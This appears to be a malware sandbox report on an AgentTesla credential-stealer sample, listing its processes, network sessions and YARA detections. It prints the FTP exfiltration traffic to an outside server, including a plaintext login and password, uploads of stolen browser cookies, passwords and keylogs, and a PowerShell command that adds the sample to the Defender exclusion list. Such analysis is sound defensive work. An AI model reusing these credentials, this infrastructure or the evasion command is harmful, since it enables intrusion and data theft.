                                                                                                          Jan 11, 2025 08:34:00.709427118 CET1.1.1.1192.168.2.40xe4dNo error (0)ftp.ercolina-usa.comercolina-usa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Jan 11, 2025 08:34:00.709427118 CET1.1.1.1192.168.2.40xe4dNo error (0)ercolina-usa.com192.254.225.136A (IP address)IN (0x0001)false
                                                                                                          • api.ipify.org
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.449732104.26.13.2054437628C:\Users\user\Desktop\dhPWt112uC.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 07:33:59 UTC155OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                          Host: api.ipify.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 07:33:59 UTC424INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 07:33:59 GMT
                                                                                                          Content-Type: text/plain
                                                                                                          Content-Length: 12
                                                                                                          Connection: close
                                                                                                          Vary: Origin
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 900338c5efbbc481-EWR
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1473&rtt_var=569&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1893644&cwnd=236&unsent_bytes=0&cid=8f3e3ea279f75d1e&ts=194&x=0"
                                                                                                          2025-01-11 07:33:59 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                          Data Ascii: 8.46.123.189


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.449746104.26.13.2054432260C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 07:34:15 UTC155OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                          Host: api.ipify.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 07:34:16 UTC424INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 07:34:16 GMT
                                                                                                          Content-Type: text/plain
                                                                                                          Content-Length: 12
                                                                                                          Connection: close
                                                                                                          Vary: Origin
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 9003392df85518c4-EWR
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1465&min_rtt=1463&rtt_var=554&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1965006&cwnd=169&unsent_bytes=0&cid=c8ad1726a614cada&ts=195&x=0"
                                                                                                          2025-01-11 07:34:16 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                          Data Ascii: 8.46.123.189


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.449751104.26.13.2054435324C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 07:34:23 UTC155OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                          Host: api.ipify.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 07:34:23 UTC424INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 07:34:23 GMT
                                                                                                          Content-Type: text/plain
                                                                                                          Content-Length: 12
                                                                                                          Connection: close
                                                                                                          Vary: Origin
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 9003395d7c9041f8-EWR
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1596&rtt_var=605&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1799137&cwnd=223&unsent_bytes=0&cid=2a6923e552ab1b3e&ts=168&x=0"
                                                                                                          2025-01-11 07:34:23 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                          Data Ascii: 8.46.123.189


                                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                          Jan 11, 2025 08:34:01.299359083 CET2149735192.254.225.136192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 02:34. Server port: 21.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 02:34. Server port: 21.220-IPv6 connections are also welcome on this server.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 02:34. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                          Jan 11, 2025 08:34:01.301261902 CET4973521192.168.2.4192.254.225.136USER ben@ercolina-usa.com
                                                                                                          Jan 11, 2025 08:34:01.449145079 CET2149735192.254.225.136192.168.2.4331 User ben@ercolina-usa.com OK. Password required
                                                                                                          Jan 11, 2025 08:34:01.452816963 CET4973521192.168.2.4192.254.225.136PASS nXe0M~WkW&nJ
                                                                                                          Jan 11, 2025 08:34:01.719630003 CET2149735192.254.225.136192.168.2.4230 OK. Current restricted directory is /
                                                                                                          Jan 11, 2025 08:34:01.872483015 CET2149735192.254.225.136192.168.2.4504 Unknown command
                                                                                                          Jan 11, 2025 08:34:01.873909950 CET4973521192.168.2.4192.254.225.136PWD
                                                                                                          Jan 11, 2025 08:34:02.022032976 CET2149735192.254.225.136192.168.2.4257 "/" is your current location
                                                                                                          Jan 11, 2025 08:34:02.022197962 CET4973521192.168.2.4192.254.225.136TYPE I
                                                                                                          Jan 11, 2025 08:34:02.170084000 CET2149735192.254.225.136192.168.2.4200 TYPE is now 8-bit binary
                                                                                                          Jan 11, 2025 08:34:02.170425892 CET4973521192.168.2.4192.254.225.136PASV
                                                                                                          Jan 11, 2025 08:34:02.318458080 CET2149735192.254.225.136192.168.2.4227 Entering Passive Mode (192,254,225,136,171,171)
                                                                                                          Jan 11, 2025 08:34:02.324115992 CET4973521192.168.2.4192.254.225.136STOR CO_Chrome_Default.txt_user-910646_2025_01_11_03_03_59.txt
                                                                                                          Jan 11, 2025 08:34:02.792187929 CET2149735192.254.225.136192.168.2.4150 Accepted data connection
                                                                                                          Jan 11, 2025 08:34:02.940927029 CET2149735192.254.225.136192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.149 seconds (measured here), 22.02 Kbytes per second
                                                                                                          Jan 11, 2025 08:34:02.941337109 CET4973521192.168.2.4192.254.225.136PASV
                                                                                                          Jan 11, 2025 08:34:03.089545965 CET2149735192.254.225.136192.168.2.4227 Entering Passive Mode (192,254,225,136,154,227)
                                                                                                          Jan 11, 2025 08:34:03.095156908 CET4973521192.168.2.4192.254.225.136STOR CO_Firefox_fqs92o4p.default-release.txt_user-910646_2025_01_11_06_03_34.txt
                                                                                                          Jan 11, 2025 08:34:03.566484928 CET2149735192.254.225.136192.168.2.4150 Accepted data connection
                                                                                                          Jan 11, 2025 08:34:03.715665102 CET2149735192.254.225.136192.168.2.4226 File successfully transferred
                                                                                                          Jan 11, 2025 08:34:17.249368906 CET2149747192.254.225.136192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 02:34. Server port: 21.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 02:34. Server port: 21.220-IPv6 connections are also welcome on this server.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 02:34. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                          Jan 11, 2025 08:34:17.249723911 CET4974721192.168.2.4192.254.225.136USER ben@ercolina-usa.com
                                                                                                          Jan 11, 2025 08:34:17.395706892 CET2149747192.254.225.136192.168.2.4331 User ben@ercolina-usa.com OK. Password required
                                                                                                          Jan 11, 2025 08:34:17.395988941 CET4974721192.168.2.4192.254.225.136PASS nXe0M~WkW&nJ
                                                                                                          Jan 11, 2025 08:34:17.636948109 CET2149747192.254.225.136192.168.2.4230 OK. Current restricted directory is /
                                                                                                          Jan 11, 2025 08:34:17.795767069 CET2149747192.254.225.136192.168.2.4504 Unknown command
                                                                                                          Jan 11, 2025 08:34:17.797269106 CET4974721192.168.2.4192.254.225.136PWD
                                                                                                          Jan 11, 2025 08:34:17.945301056 CET2149747192.254.225.136192.168.2.4257 "/" is your current location
                                                                                                          Jan 11, 2025 08:34:17.946938992 CET4974721192.168.2.4192.254.225.136TYPE I
                                                                                                          Jan 11, 2025 08:34:18.094849110 CET2149747192.254.225.136192.168.2.4200 TYPE is now 8-bit binary
                                                                                                          Jan 11, 2025 08:34:18.094991922 CET4974721192.168.2.4192.254.225.136PASV
                                                                                                          Jan 11, 2025 08:34:18.241627932 CET2149747192.254.225.136192.168.2.4227 Entering Passive Mode (192,254,225,136,192,38)
                                                                                                          Jan 11, 2025 08:34:18.247210026 CET4974721192.168.2.4192.254.225.136STOR PW_user-910646_2025_01_11_02_34_15.html
                                                                                                          Jan 11, 2025 08:34:18.709141970 CET2149747192.254.225.136192.168.2.4150 Accepted data connection
                                                                                                          Jan 11, 2025 08:34:18.857029915 CET2149747192.254.225.136192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.148 seconds (measured here), 2.29 Kbytes per second
                                                                                                          Jan 11, 2025 08:34:18.879103899 CET4974721192.168.2.4192.254.225.136PASV
                                                                                                          Jan 11, 2025 08:34:19.025227070 CET2149747192.254.225.136192.168.2.4227 Entering Passive Mode (192,254,225,136,171,39)
                                                                                                          Jan 11, 2025 08:34:19.034404993 CET4974721192.168.2.4192.254.225.136STOR CO_Chrome_Default.txt_user-910646_2025_01_11_05_23_58.txt
                                                                                                          Jan 11, 2025 08:34:19.495796919 CET2149747192.254.225.136192.168.2.4150 Accepted data connection
                                                                                                          Jan 11, 2025 08:34:19.643299103 CET2149747192.254.225.136192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.147 seconds (measured here), 22.25 Kbytes per second
                                                                                                          Jan 11, 2025 08:34:19.643683910 CET4974721192.168.2.4192.254.225.136PASV
                                                                                                          Jan 11, 2025 08:34:19.790035009 CET2149747192.254.225.136192.168.2.4227 Entering Passive Mode (192,254,225,136,125,215)
                                                                                                          Jan 11, 2025 08:34:19.795526028 CET4974721192.168.2.4192.254.225.136STOR CO_Firefox_fqs92o4p.default-release.txt_user-910646_2025_01_11_06_33_41.txt
                                                                                                          Jan 11, 2025 08:34:20.258364916 CET2149747192.254.225.136192.168.2.4150 Accepted data connection
                                                                                                          Jan 11, 2025 08:34:20.412659883 CET2149747192.254.225.136192.168.2.4226 File successfully transferred
                                                                                                          Jan 11, 2025 08:34:24.729182005 CET2149752192.254.225.136192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 02:34. Server port: 21.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 02:34. Server port: 21.220-IPv6 connections are also welcome on this server.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 02:34. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                          Jan 11, 2025 08:34:24.730343103 CET4975221192.168.2.4192.254.225.136USER ben@ercolina-usa.com
                                                                                                          Jan 11, 2025 08:34:24.879705906 CET2149752192.254.225.136192.168.2.4331 User ben@ercolina-usa.com OK. Password required
                                                                                                          Jan 11, 2025 08:34:24.879857063 CET4975221192.168.2.4192.254.225.136PASS nXe0M~WkW&nJ
                                                                                                          Jan 11, 2025 08:34:25.136733055 CET2149752192.254.225.136192.168.2.4230 OK. Current restricted directory is /
                                                                                                          Jan 11, 2025 08:34:25.286025047 CET2149752192.254.225.136192.168.2.4504 Unknown command
                                                                                                          Jan 11, 2025 08:34:25.286140919 CET4975221192.168.2.4192.254.225.136PWD
                                                                                                          Jan 11, 2025 08:34:25.435256958 CET2149752192.254.225.136192.168.2.4257 "/" is your current location
                                                                                                          Jan 11, 2025 08:34:25.435436010 CET4975221192.168.2.4192.254.225.136TYPE I
                                                                                                          Jan 11, 2025 08:34:25.584865093 CET2149752192.254.225.136192.168.2.4200 TYPE is now 8-bit binary
                                                                                                          Jan 11, 2025 08:34:25.585024118 CET4975221192.168.2.4192.254.225.136PASV
                                                                                                          Jan 11, 2025 08:34:25.734584093 CET2149752192.254.225.136192.168.2.4227 Entering Passive Mode (192,254,225,136,177,133)
                                                                                                          Jan 11, 2025 08:34:25.740138054 CET4975221192.168.2.4192.254.225.136STOR PW_user-910646_2025_01_11_02_34_23.html
                                                                                                          Jan 11, 2025 08:34:26.209619999 CET2149752192.254.225.136192.168.2.4150 Accepted data connection
                                                                                                          Jan 11, 2025 08:34:26.360286951 CET2149752192.254.225.136192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.151 seconds (measured here), 2.25 Kbytes per second
                                                                                                          Jan 11, 2025 08:34:26.382117033 CET4975221192.168.2.4192.254.225.136PASV
                                                                                                          Jan 11, 2025 08:34:26.531615019 CET2149752192.254.225.136192.168.2.4227 Entering Passive Mode (192,254,225,136,167,44)
                                                                                                          Jan 11, 2025 08:34:26.537722111 CET4975221192.168.2.4192.254.225.136STOR CO_Chrome_Default.txt_user-910646_2025_01_11_05_34_05.txt
                                                                                                          Jan 11, 2025 08:34:27.002496958 CET2149752192.254.225.136192.168.2.4150 Accepted data connection
                                                                                                          Jan 11, 2025 08:34:27.152502060 CET2149752192.254.225.136192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.150 seconds (measured here), 21.84 Kbytes per second
                                                                                                          Jan 11, 2025 08:34:27.153107882 CET4975221192.168.2.4192.254.225.136PASV
                                                                                                          Jan 11, 2025 08:34:27.302397013 CET2149752192.254.225.136192.168.2.4227 Entering Passive Mode (192,254,225,136,193,174)
                                                                                                          Jan 11, 2025 08:34:27.307771921 CET4975221192.168.2.4192.254.225.136STOR CO_Firefox_fqs92o4p.default-release.txt_user-910646_2025_01_11_06_33_51.txt
                                                                                                          Jan 11, 2025 08:34:27.772250891 CET2149752192.254.225.136192.168.2.4150 Accepted data connection
                                                                                                          Jan 11, 2025 08:34:27.922419071 CET2149752192.254.225.136192.168.2.4226 File successfully transferred
                                                                                                          Jan 11, 2025 08:35:33.028836966 CET4973521192.168.2.4192.254.225.136PASV
                                                                                                          Jan 11, 2025 08:35:33.176716089 CET2149735192.254.225.136192.168.2.4227 Entering Passive Mode (192,254,225,136,123,67)
                                                                                                          Jan 11, 2025 08:35:33.182332039 CET4973521192.168.2.4192.254.225.136STOR KL_user-910646_2025_01_26_20_34_39.html
                                                                                                          Jan 11, 2025 08:35:33.820887089 CET2149735192.254.225.136192.168.2.4150 Accepted data connection
                                                                                                          Jan 11, 2025 08:35:33.969130039 CET2149735192.254.225.136192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.167 seconds (measured here), 1.65 Kbytes per second

                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Click to jump to process

                                                                                                          Target ID:0
                                                                                                          Start time:02:33:50
                                                                                                          Start date:11/01/2025
                                                                                                          Path:C:\Users\user\Desktop\dhPWt112uC.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\dhPWt112uC.exe"
                                                                                                          Imagebase:0x280000
                                                                                                          File size:889'344 bytes
                                                                                                          MD5 hash:2327E5C20B3CCE0BE582DBE461480CC2
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:2
                                                                                                          Start time:02:33:57
                                                                                                          Start date:11/01/2025
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe"
                                                                                                          Imagebase:0xdc0000
                                                                                                          File size:433'152 bytes
                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:3
                                                                                                          Start time:02:33:57
                                                                                                          Start date:11/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:4
                                                                                                          Start time:02:33:57
                                                                                                          Start date:11/01/2025
                                                                                                          Path:C:\Users\user\Desktop\dhPWt112uC.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\dhPWt112uC.exe"
                                                                                                          Imagebase:0xed0000
                                                                                                          File size:889'344 bytes
                                                                                                          MD5 hash:2327E5C20B3CCE0BE582DBE461480CC2
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4168329440.000000000344C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4168329440.0000000003421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4168329440.0000000003421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Target ID:5
                                                                                                          Start time:02:33:59
                                                                                                          Start date:11/01/2025
                                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                          Imagebase:0x7ff693ab0000
                                                                                                          File size:496'640 bytes
                                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:7
                                                                                                          Start time:02:34:08
                                                                                                          Start date:11/01/2025
                                                                                                          Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                                                                                                          Imagebase:0x660000
                                                                                                          File size:889'344 bytes
                                                                                                          MD5 hash:2327E5C20B3CCE0BE582DBE461480CC2
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1954874837.0000000003B65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1954874837.0000000003B65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Avira
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          • Detection: 75%, ReversingLabs
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:10
                                                                                                          Start time:02:34:13
                                                                                                          Start date:11/01/2025
                                                                                                          Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                                                                                                          Imagebase:0xe50000
                                                                                                          File size:889'344 bytes
                                                                                                          MD5 hash:2327E5C20B3CCE0BE582DBE461480CC2
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2008765342.0000000003261000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2008765342.0000000003261000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2000218775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2000218775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2008765342.000000000328C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:11
                                                                                                          Start time:02:34:16
                                                                                                          Start date:11/01/2025
                                                                                                          Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                                                                                                          Imagebase:0xce0000
                                                                                                          File size:889'344 bytes
                                                                                                          MD5 hash:2327E5C20B3CCE0BE582DBE461480CC2
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2032655165.0000000004271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2032655165.0000000004271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2032655165.00000000042F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2032655165.00000000042F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:12
                                                                                                          Start time:02:34:21
                                                                                                          Start date:11/01/2025
                                                                                                          Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                                                                                                          Imagebase:0x440000
                                                                                                          File size:889'344 bytes
                                                                                                          MD5 hash:2327E5C20B3CCE0BE582DBE461480CC2
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:13
                                                                                                          Start time:02:34:21
                                                                                                          Start date:11/01/2025
                                                                                                          Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                                                                                                          Imagebase:0x210000
                                                                                                          File size:889'344 bytes
                                                                                                          MD5 hash:2327E5C20B3CCE0BE582DBE461480CC2
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:14
                                                                                                          Start time:02:34:21
                                                                                                          Start date:11/01/2025
                                                                                                          Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                                                                                                          Imagebase:0xa0000
                                                                                                          File size:889'344 bytes
                                                                                                          MD5 hash:2327E5C20B3CCE0BE582DBE461480CC2
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:15
                                                                                                          Start time:02:34:21
                                                                                                          Start date:11/01/2025
                                                                                                          Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                                                                                                          Imagebase:0x910000
                                                                                                          File size:889'344 bytes
                                                                                                          MD5 hash:2327E5C20B3CCE0BE582DBE461480CC2
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.4167926761.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.4167926761.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.4167926761.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:10.8%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:2.3%
                                                                                                            Total number of Nodes:305
                                                                                                            Total number of Limit Nodes:15
